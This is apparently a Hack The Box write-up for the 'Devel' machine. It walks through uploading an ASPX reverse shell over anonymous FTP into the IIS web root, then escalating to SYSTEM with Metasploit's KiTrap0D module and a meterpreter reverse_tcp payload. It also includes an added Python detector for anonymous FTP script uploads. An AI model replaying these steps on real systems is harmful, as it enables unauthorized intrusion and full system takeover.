Hack The Box: Devel


Enumeration


The nmap scan reveals two open ports: 21 and 80.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The FTP server allows anonymous login, so let’s log in and see what we can get.


Initial Foothold

The FTP server seems to host the web server’s root directory. We can download the iisstart.htm document, but the aspnet_client directory appears empty.

03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png

The website seems to host a simple IIS sample webpage.


We can confirm that the FTP root really is the web server’s content directory: anything we upload is served immediately. For example, after uploading a test file:

ftp> put test.txt


So let’s try to upload a web shell. First I tried a PHP shell, but then I remembered that the web root contains an aspnet_client directory, which means that the server is probably running ASP.NET. After uploading this reverse shell, we get a shell on the box. Unfortunately the user does not have many privileges, and I also could not find any further information (like passwords etc.), so let’s see what Metasploit suggests as the next step.
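From the defender’s side, the whole foothold leaves a clear trace: an anonymous FTP session issuing STOR for a script file into the IIS content directory. The script below is an added example (not from the writeup or from Microsoft) that scans an IIS 7.5 FTP log in W3C format and raises alerts for completed uploads, ranking executable content written by the anonymous user highest. The log lines are constructed; the column order is read from the #Fields header rather than hard-coded, so a real log with a different field list still parses. The server address 192.0.2.10 is a placeholder.

```python
import os

# Constructed sample log in IIS 7.5 FTP W3C format. The field layout here is assumed;
# the parser reads the #Fields line, so a differently configured log still maps correctly.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2017-03-17 16:37:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2017-03-17 16:37:05 10.10.14.28 - 192.0.2.10 21 USER anonymous 331 0 0 7f3a /
2017-03-17 16:37:05 10.10.14.28 anonymous 192.0.2.10 21 PASS *** 230 0 0 7f3a /
2017-03-17 16:37:12 10.10.14.28 anonymous 192.0.2.10 21 STOR test.txt 226 0 0 7f3a /test.txt
2017-03-17 16:38:40 10.10.14.28 anonymous 192.0.2.10 21 STOR shell.aspx 226 0 0 7f3a /shell.aspx
2017-03-17 16:39:01 10.10.14.28 anonymous 192.0.2.10 21 RETR iisstart.htm 226 0 0 7f3a /iisstart.htm
2017-03-17 16:40:22 10.10.14.28 anonymous 192.0.2.10 21 STOR evil.php 550 0 0 7f3a /evil.php
"""

# File types IIS (or a co-hosted interpreter) would execute or honour if dropped into the web root.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".asmx", ".ashx", ".asax", ".php", ".cer", ".exe", ".dll", ".config"}


def parse_w3c(text):
    """Yield one dict per log record, keyed by the names given in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # no header yet, or a record we cannot map (e.g. a path containing spaces)
        yield dict(zip(fields, values))


def scan_ftp_log(text):
    """Return alerts for completed uploads; script uploads by the anonymous user rank highest."""
    alerts = []
    for rec in parse_w3c(text):
        if rec.get("cs-method") != "STOR":
            continue
        if not rec.get("sc-status", "").startswith("2"):
            continue  # FTP 2xx means the transfer completed; a 550 STOR never wrote a file
        path = rec.get("x-fullpath") or rec.get("cs-uri-stem", "")
        ext = os.path.splitext(path)[1].lower()
        anonymous = rec.get("cs-username", "").lower() in ("anonymous", "ftp")
        if ext in SCRIPT_EXTENSIONS:
            severity = "high" if anonymous else "medium"
            reason = "executable content written to the FTP root"
        elif anonymous:
            severity, reason = "medium", "anonymous user has write access"
        else:
            continue
        alerts.append({
            "time": f"{rec['date']} {rec['time']}",
            "client": rec["c-ip"],
            "user": rec["cs-username"],
            "path": path,
            "severity": severity,
            "reason": reason,
        })
    return alerts


if __name__ == "__main__":
    for a in scan_ftp_log(SAMPLE_LOG):
        print(f"{a['time']} [{a['severity']}] {a['client']} as {a['user']} wrote {a['path']}: {a['reason']}")
```

Any successful STOR by the anonymous account is already an alert here, because the real misconfiguration on this box is anonymous write access to the web root at all; the extension check only raises the priority. The 550 entry shows why the status filter matters: a rejected upload is evidence of an attempt but not of a file on disk.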

> use multi/recon/local_exploit_suggester
> set session 1
> run

This returns a number of exploits that could be tried; what we are looking for is privilege escalation. The second hit already looks promising: Windows SYSTEM Escalation via KiTrap0D. Let’s try it:

msf6 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.28      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

And with this, we get a shell as NT AUTHORITY\SYSTEM on the Windows machine and can download both flags.